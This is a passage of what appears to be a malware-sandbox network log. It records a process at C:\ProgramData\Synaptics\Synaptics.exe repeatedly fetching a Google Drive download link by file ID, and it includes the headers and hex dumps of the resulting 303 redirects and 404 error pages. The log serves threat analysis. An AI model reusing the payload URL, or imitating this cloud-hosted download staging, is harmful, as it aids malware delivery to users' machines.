                                                                                                                    2024-12-30 10:26:00 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                    2024-12-30 10:26:00 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 52 4b 37 38 50 72 55 31 30 48 55 62 47 45 37 35 77 71 69 49 69 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="RK78PrU10HUbGE75wqiIiQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                    2024-12-30 10:26:00 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    115192.168.2.949898142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:26:00 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:26:01 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:01 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-d_N0LIlV09Xh66wmkOTWLw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    116192.168.2.949899142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:26:00 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:26:01 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:01 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-CJTuZL-YZ09pftQwCVmGLA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    117192.168.2.949901142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:26:01 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    118192.168.2.949902142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:26:01 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    119192.168.2.949909142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:26:02 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:26:02 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC6_3v9E3Uv6PltVdxHDqNY53sZ_h9UjqMFqSjVOYSwlSsolWaBAuQnxZfpHCvkqJeBj
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:02 GMT
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-9_dYsm2cApJwMtu1Pcs3FQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:26:02 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                    2024-12-30 10:26:02 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6e 41 6d 48 67 6d 65 57 30 4c 6e 73 67 4d 70 59 6c 4b 64 33 70 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="nAmHgmeW0LnsgMpYlKd3pA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                    2024-12-30 10:26:02 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    120192.168.2.949907142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:26:02 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:26:02 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:02 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-uQ5pjlH4Zm__sDoUvGsTRg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    121192.168.2.949908142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:26:02 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:26:02 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC5fgCE-izE8UJ3wqfSLfseAa0hRGqbhEua142We6KsOT-ahhgMeNgyrSZSzp4-V_-Xa
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:02 GMT
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-nirHLKwqxJuop_JKW-CfVQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:26:02 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                    2024-12-30 10:26:02 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4c 56 44 4c 68 5f 68 6c 79 71 43 32 74 68 47 4a 30 64 4f 42 76 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="LVDLh_hlyqC2thGJ0dOBvw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                    2024-12-30 10:26:02 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    122192.168.2.949910142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:26:02 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:26:02 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:02 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-0C5nb2GxBJb3xIGzHz99fA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    123192.168.2.949911142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:26:03 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:26:03 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:26:03 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-KO229q-poEldv_Glk7u9QQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
